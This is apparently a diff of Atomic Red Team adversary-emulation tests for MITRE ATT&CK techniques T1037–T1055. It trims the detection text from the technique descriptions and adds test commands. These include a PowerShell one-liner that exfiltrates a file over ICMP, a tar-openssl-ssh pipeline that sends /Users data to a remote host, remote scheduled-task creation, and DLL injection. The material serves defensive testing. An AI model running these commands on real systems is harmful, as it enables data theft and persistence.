+  executor:
+    name: sh
+    command: |
+      cp /bin/sh /tmp/crond
+      /tmp/crond
@@ -1,22 +1,14 @@
 # T1037 - Logon Scripts
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037)
-<blockquote>===Windows===
+<blockquote>### Windows

 Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.

 If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

-===Mac===
+### Mac

-Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.
-
-Detection: Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties.
-
-Platforms: macOS, Windows
-
-Data Sources: File monitoring, Process monitoring
-
-System Requirements: Write access to system or domain logon scripts</blockquote>
+Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</blockquote>

 ## Atomic Tests

@@ -1,18 +1,10 @@
 # T1040 - Network Sniffing
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1040)
-<blockquote>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
+<blockquote>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

-User credentials may be sent over an insecure, unencrypted protocol that can be captured and obtained through network packet analysis. An adversary may place a network interface into promiscuous mode, using a utility to capture traffic in transit over the network or use span ports to capture a larger amount of data. In addition, techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning, can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
+Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

-Detection: Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a man-in-the-middle attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: Network device logs, Host network interface, Netflow/Enclave netflow
-
-Permissions Required: Administrator, SYSTEM
-
-System Requirements: Network interface access and packet capture driver</blockquote>
+Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.</blockquote>

 ## Atomic Tests

@@ -1,27 +1,13 @@
 # T1042 - Change Default File Association
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1042)
-<blockquote>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access. (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
+<blockquote>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

 System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example:
-*<code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>
-*<code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>
-*<code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>
+* <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>
+* <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>
+* <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

-The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.
-
-Detection: Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. 
-
-User file association preferences are stored under <code> [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts</code> and override associations configured under <code>[HKEY_CLASSES_ROOT]</code>. Changes to a user's preference will occur under this entry's subkeys.
-
-Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.
-
-Platforms: Windows
-
-Data Sources: Windows Registry, Process command-line parameters, Process monitoring
-
-Permissions Required: User, Administrator, SYSTEM
-
-Contributors: Stefan Kanthak, Travis Smith, Tripwire</blockquote>
+The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</blockquote>

 ## Atomic Tests

@@ -44,6 +30,6 @@ Change Default File Association From cmd.exe

 #### Run it with `command_prompt`!
 ```
-cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"
+cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
 ```
 <br/>
@@ -21,4 +21,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"
+      cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
@@ -1,16 +1,6 @@
 # T1046 - Network Service Scanning
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1046)
-<blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
-Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process use of network
-
-Permissions Required: User, Administrator, SYSTEM</blockquote>
+<blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.</blockquote>

 ## Atomic Tests

@@ -2,21 +2,7 @@
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
 <blockquote>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)

-An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
-
-Detection: Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)
-
-Platforms: Windows
-
-Data Sources: Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
-
-Permissions Required: User, Administrator
-
-System Requirements: WMI service, winmgmt, running.
-Host/network firewalls allowing SMB and WMI ports from source to destination.
-SMB authentication.
-
-Remote Support: Yes</blockquote>
+An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)</blockquote>

 ## Atomic Tests

@@ -1,14 +1,6 @@
 # T1048 - Exfiltration Over Alternative Protocol
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048)
-<blockquote>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.
-
-Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: User interface, Process monitoring, Process use of network, Packet capture, Netflow/Enclave netflow, Network protocol analysis
-
-Requires Network: Yes</blockquote>
+<blockquote>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.</blockquote>

 ## Atomic Tests

@@ -18,6 +10,8 @@ Requires Network: Yes</blockquote>

 - [Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP](#atomic-test-3---exfiltration-over-alternative-protocol---http)

+- [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
+

 <br/>

@@ -51,6 +45,13 @@ Local to Remote
 **Supported Platforms:** macOS, CentOS, Ubuntu, Linux


+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| domain | target SSH domain | url | target.example.com|
+| user_name | username for domain | string | atomic|
+| password | password for user | string | atomic|
+
 #### Run it with `sh`!
 ```
 tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
@@ -81,3 +82,22 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on


 <br/>
+<br/>
+
+## Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP
+Exfiltration of specified file over ICMP protocol.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
+| ip_address | Destination IP address where the data should be sent. | String | 1.1.1.1|
+
+#### Run it with `powershell`!
+```
+$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
+```
+<br/>
@@ -46,6 +46,20 @@ atomic_tests:
    - ubuntu
    - linux

+  input_arguments:
+    domain:
+      description: target SSH domain
+      type: url
+      default: target.example.com
+    user_name:
+      description: username for domain
+      type: string
+      default: atomic
+    password:
+      description: password for user
+      type: string
+      default: atomic
+
  executor:
    name: sh
    command: |
@@ -77,3 +91,25 @@ atomic_tests:
      3. To retrieve the data from an adversary system:

          wget http://VICTIM_IP:1337/victim-file.txt
+
+- name: Exfiltration Over Alternative Protocol - ICMP
+  description: |
+    Exfiltration of specified file over ICMP protocol.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    input_file:
+      description: Path to file to be exfiltrated.
+      type: Path
+      default: C:\Windows\System32\notepad.exe
+    ip_address:
+      description: Destination IP address where the data should be sent.
+      type: String
+      default: 1.1.1.1
+
+  executor:
+    name: powershell
+    command: |
+      $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
@@ -2,23 +2,13 @@
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1049)
 <blockquote>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 

-===Windows===
+### Windows

-Utilities and commands that acquire this information include netstat, "net use," and "net session" with Net.
+Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039).

-===Mac and Linux ===
+### Mac and Linux 

-In Mac and Linux, <code>netstat</code> and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session".
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
-Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: Process command-line parameters, Process monitoring
-
-Permissions Required: User, Administrator</blockquote>
+In Mac and Linux, <code>netstat</code> and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session".</blockquote>

 ## Atomic Tests

@@ -2,21 +2,7 @@
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1050)
 <blockquote>When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. 

-Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.
-
-Detection: Monitor service creation through changes in the Registry and common utilities using command-line invocation. New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
-
-Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
-
-Monitor processes and command-line arguments for actions that could create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
-
-Platforms: Windows
-
-Data Sources: Windows Registry, Process monitoring, Process command-line parameters
-
-Effective Permissions: SYSTEM
-
-Permissions Required: Administrator, SYSTEM</blockquote>
+Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).</blockquote>

 ## Atomic Tests

@@ -33,9 +19,18 @@ Installs A Local Service
 **Supported Platforms:** Windows


+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
+| service_name | Name of the Service | String | AtomicTestService|
+
 #### Run it with `command_prompt`!
 ```
-sc create TestService binPath="C:\Path\file.exe"
+sc.exe create #{service_name} binPath= #{binary_path}
+sc.exe start #{service_name}
+sc.exe stop #{service_name}
+sc.exe delete #{service_name}
 ```
 <br/>
 <br/>
@@ -46,8 +41,17 @@ Installs A Local Service via PowerShell
 **Supported Platforms:** Windows


+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe|
+| service_name | Name of the Service | String | AtomicTestService|
+
 #### Run it with `powershell`!
 ```
-powershell New-Service -Name "TestService" -BinaryPathName "C:\Path\file.exe"
+New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
+Start-Service -Name "#{service_name}"
+Stop-Service -Name "#{service_name}"
+(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()
 ```
 <br/>
@@ -9,10 +9,23 @@ atomic_tests:

  supported_platforms:
    - windows
+  input_arguments:
+    binary_path:
+      description: Name of the service binary, include path.
+      type: Path
+      default: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe
+    service_name:
+      description: Name of the Service
+      type: String
+      default: AtomicTestService
  executor:
    name: command_prompt
    command: |
-      sc create TestService binPath="C:\Path\file.exe"
+      sc.exe create #{service_name} binPath= #{binary_path}
+      sc.exe start #{service_name}
+      sc.exe stop #{service_name}
+      sc.exe delete #{service_name}
+
 - name: Service Installation PowerShell
    Installs A Local Service using PowerShell
  description: |
@@ -20,7 +33,19 @@ atomic_tests:

  supported_platforms:
    - windows
+  input_arguments:
+    binary_path:
+      description: Name of the service binary, include path.
+      type: Path
+      default: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe
+    service_name:
+      description: Name of the Service
+      type: String
+      default: AtomicTestService
  executor:
    name: powershell
    command: |
-      powershell New-Service -Name "TestService" -BinaryPathName "C:\Path\file.exe"
+      New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
+      Start-Service -Name "#{service_name}"
+      Stop-Service -Name "#{service_name}"
+      (Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()
@@ -6,7 +6,7 @@ using System.Diagnostics;
 using System.ServiceProcess;

 // c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe AtomicService.cs
-// sc create AtomicService binPath= "C:\Test\AtomicService.exe"
+// sc create AtomicService binPath= "C:\AtomicRedTeam\atomics\T10150\bin\AtomicService.exe"
 // sc start AtomicService
 // sc stop AtomicSerivce
 // sc delete AtomicSerivce
@@ -1,32 +1,8 @@
 # T1053 - Scheduled Task
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053)
-<blockquote>Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. (Citation: TechNet Task Scheduler Security)
+<blockquote>Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. (Citation: TechNet Task Scheduler Security)

-An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
-
-Detection: Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Monitor process execution from the <code>svchost.exe</code> in Windows 10 and the Windows Task Scheduler <code>taskeng.exe</code> for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in <code>%systemroot%\System32\Tasks</code> for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
-
-Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)
-
-*Event ID 106 - Scheduled task registered
-*Event ID 140 - Scheduled task updated
-*Event ID 141 - Scheduled task removed
-
-Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Look for changes to tasks that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data.
-
-Monitor processes and command-line arguments for actions that could be taken to create tasks. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
-
-Platforms: Windows
-
-Data Sources: File monitoring, Process command-line parameters, Process monitoring, Windows event logs
-
-Effective Permissions: Administrator, SYSTEM, User
-
-Permissions Required: Administrator, SYSTEM, User
-
-Remote Support: Yes
-
-Contributors: Travis Smith, Tripwire, Leo Loobeek, @leoloobeek, Alain Homewood, Insomnia Security</blockquote>
+An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.</blockquote>

 ## Atomic Tests

@@ -88,6 +64,6 @@ Create a task on a remote system

 #### Run it with `command_prompt`!
 ```
-SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
+SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 ```
 <br/>
@@ -35,6 +35,7 @@ atomic_tests:
    name: command_prompt
    command: |
      SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
+
 - name: Scheduled task Remote
  description: |
      Create a task on a remote system
@@ -65,4 +66,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
+      SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
@@ -2,44 +2,26 @@
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
 <blockquote>Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

-===Windows===
+### Windows

-There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Engame Process Injection July 2017)
-* '''Dynamic-link library (DLL) injection''' involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
-* '''Portable executable injection''' involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)
-* '''Thread execution hijacking''' involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.
-* '''Asynchronous Procedure Call''' (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing  (Citation: ENSIL AtomBombing Oct 2016) is a variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)
-* '''Thread Local Storage''' (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)
+There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)

-===Mac and Linux===
+* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
+* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)
+* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.
+* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018)  AtomBombing  (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)
+* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)
+
+### Mac and Linux

 Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)
-*'''LD_PRELOAD, LD_LIBRARY_PATH''' (Linux), '''DYLD_INSERT_LIBRARIES''' (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
-*'''Ptrace system calls''' can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
-*'''/proc/[pid]/mem''' provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
-*'''VDSO hijacking''' performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)

-Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
+* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
+* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
+* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
+* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)

-Detection: Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Engame Process Injection July 2017)
-
-Monitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.  (Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits)
-
-Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)
-
-Monitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using PowerShell with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this behavior.
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: API monitoring, Windows Registry, File monitoring, DLL monitoring, Named Pipes, Process Monitoring
-
-Effective Permissions: User, Administrator, SYSTEM, root
-
-Defense Bypassed: Process whitelisting, Anti-virus
-
-Permissions Required: User, Administrator, SYSTEM, root
-
-Contributors: Anastasios Pingios</blockquote>
+Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.</blockquote>

 ## Atomic Tests

@@ -47,6 +29,10 @@ Contributors: Anastasios Pingios</blockquote>

 - [Atomic Test #2 - Process Injection via PowerSploit](#atomic-test-2---process-injection-via-powersploit)

+- [Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-3---shared-library-injection-via-etcldsopreload)
+
+- [Atomic Test #4 - Process Injection via C#](#atomic-test-4---process-injection-via-c)
+

 <br/>

@@ -59,7 +45,7 @@ Windows 10 Utility To Inject DLLS
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| dll_payload | DLL to Inject | Path | T1055.dll|
+| dll_payload | DLL to Inject | Path | C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll|
 | process_id | PID of input_arguments | Int | $pid|

 #### Run it with `powershell`!
@@ -70,7 +56,7 @@ mavinject $pid /INJECTRUNNING #{dll_payload}
 <br/>

 ## Atomic Test #2 - Process Injection via PowerSploit
-PowerShell Injection
+PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)

 **Supported Platforms:** Windows

@@ -86,3 +72,46 @@ PowerShell Injection
